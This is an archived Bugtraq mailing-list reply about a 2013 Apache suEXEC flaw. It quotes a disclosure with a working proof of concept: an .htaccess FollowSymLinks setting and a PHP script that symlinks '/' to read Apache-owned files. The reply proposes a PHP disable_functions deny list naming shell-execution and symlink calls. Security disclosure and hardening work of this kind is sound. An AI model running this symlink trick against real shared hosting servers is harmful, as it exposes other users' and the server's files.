看板 Bugtraq 關於我們 聯絡資訊
--cCCUtJNjaMSDCm71st48On1O3ftb6aQXx Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Am 09.08.2013 09:29, schrieb Kingcope: > So what your Emails Tell me is better ignore this vulnerability. I dont= Claim its a High severity Bug but if you Tell People to ignore it Becaus= e it isnt a vulnerability you are very much aiding the Chaos of insecurit= y in the Internet today. You Maybe have a Secure Setting but theres only = you on the Planet. Attackers Look specifically for such Bugs to Open Serv= ers. No Wonder we have compromises in a High Scale every Day due to this = ignorance. My rant on that One. >> The above php script will simply create a symbolic link to '/' >> A request to test99.php/etc/testapache done with a web browser shows..= >> voila! read with the apache uid/gid if the script is possible to do so the admin did not his homework on shared servers have symlink amd system-functions to be disabled period disable_functions =3D "exec, passthru, shell_exec, system, proc_open, pr= oc_close, proc_nice, proc_terminate, proc_get_status, pcntl_exec, apache_child_terminate, posix_kill, posix_mk= fifo, posix_setpgid, posix_setsid, posix_setuid, mail, symlink, link, dl, get_current_user, getmypid, getmyu= id, getrusage, pfsockopen, socket_accept, socket_bind, openlog, syslog" > Am 07.08.2013 um 21:49 schrieb king cope <isowarez.isowarez.isowarez@go= oglemail.com>: >=20 >> Apache suEXEC privilege elevation / information disclosure >> >> Discovered by Kingcope/Aug 2013 >> >> The suEXEC feature provides Apache users the ability to run CGI and SS= I programs >> under user IDs different from the user ID of the calling web server. N= ormally, >> when a CGI or SSI program executes, it runs as the same user who is ru= nning the >> web server. >> Used properly, this feature can reduce considerably the security risks= involved >> with allowing users to develop and run private CGI or SSI programs. >> >> With this bug an attacker who is able to run php or cgi code inside a = web >> hosting environment and the environment is configured to use suEXEC as= a >> protection mechanism, he/she is able to read any file and directory on= the file- >> system of the UNIX/Linux system with the user and group id of the >> apache web server. >> >> Normally php and cgi scripts are not allowed to read files with the ap= ache user- >> id inside a suEXEC configured environment. >> >> Take for example this apache owned file and the php script that follow= s. >> >> $ ls -la /etc/testapache >> -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache >> only user www-data should be able to read this file. >> >> $ cat test.php >> <?php >> system("id; cat /etc/testapache"); >> ?> >> >> When calling the php file using a webbrowser it will show... >> uid=3D1002(example) gid=3D1002(example) groups=3D1002(example) >> >> because the php script is run trough suEXEC. >> The script will not output the file requested because of a permissions= error. >> >> Now if we create a .htaccess file with the content... >> Options Indexes FollowSymLinks >> >> and a php script with the content... >> >> <?php >> system("ln -sf / test99.php"); >> symlink("/", "test99.php"); // try builtin function in case whe= n >> //system() is blocked >> ?> >> in the same folder >> >> ..we can access the root filesystem with the apache uid,gid by >> requesting test99.php. >> The above php script will simply create a symbolic link to '/'. >> >> A request to test99.php/etc/testapache done with a web browser shows..= >> voila! read with the apache uid/gid >> >> The reason we can now read out any files and traverse directories owne= d by the >> apache user is because apache httpd displays symlinks and directory li= stings >> without querying suEXEC. >> It is not possible to write to files in this case. >> >> Version notes. Assumed is that all Apache versions are affected by thi= s bug. >> >> apache2 -V >> Server version: Apache/2.2.22 (Debian) >> Server built: Mar 4 2013 21:32:32 >> Server's Module Magic Number: 20051115:30 >> Server loaded: APR 1.4.6, APR-Util 1.4.1 >> Compiled using: APR 1.4.6, APR-Util 1.4.1 >> Architecture: 32-bit >> Server MPM: Worker >> threaded: yes (fixed thread count) >> forked: yes (variable process count) >> Server compiled with.... >> -D APACHE_MPM_DIR=3D"server/mpm/worker" >> -D APR_HAS_SENDFILE >> -D APR_HAS_MMAP >> -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) >> -D APR_USE_SYSVSEM_SERIALIZE >> -D APR_USE_PTHREAD_SERIALIZE >> -D APR_HAS_OTHER_CHILD >> -D AP_HAVE_RELIABLE_PIPED_LOGS >> -D DYNAMIC_MODULE_LIMIT=3D128 >> -D HTTPD_ROOT=3D"/etc/apache2" >> -D SUEXEC_BIN=3D"/usr/lib/apache2/suexec" >> -D DEFAULT_PIDLOG=3D"/var/run/apache2.pid" >> -D DEFAULT_SCOREBOARD=3D"logs/apache_runtime_status" >> -D DEFAULT_ERRORLOG=3D"logs/error_log" >> -D AP_TYPES_CONFIG_FILE=3D"mime.types" >> -D SERVER_CONFIG_FILE=3D"apache2.conf" >> >> Cheers, >> /Kingcope --cCCUtJNjaMSDCm71st48On1O3ftb6aQXx Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEARECAAYFAlIEy44ACgkQhmBjz394AnmGpACfVzB2pca8Au1nNHtBhZYDrfrw oTwAnjQO4B7FDhLK68QK6YKH4StOZKb/ =XfJj -----END PGP SIGNATURE----- --cCCUtJNjaMSDCm71st48On1O3ftb6aQXx--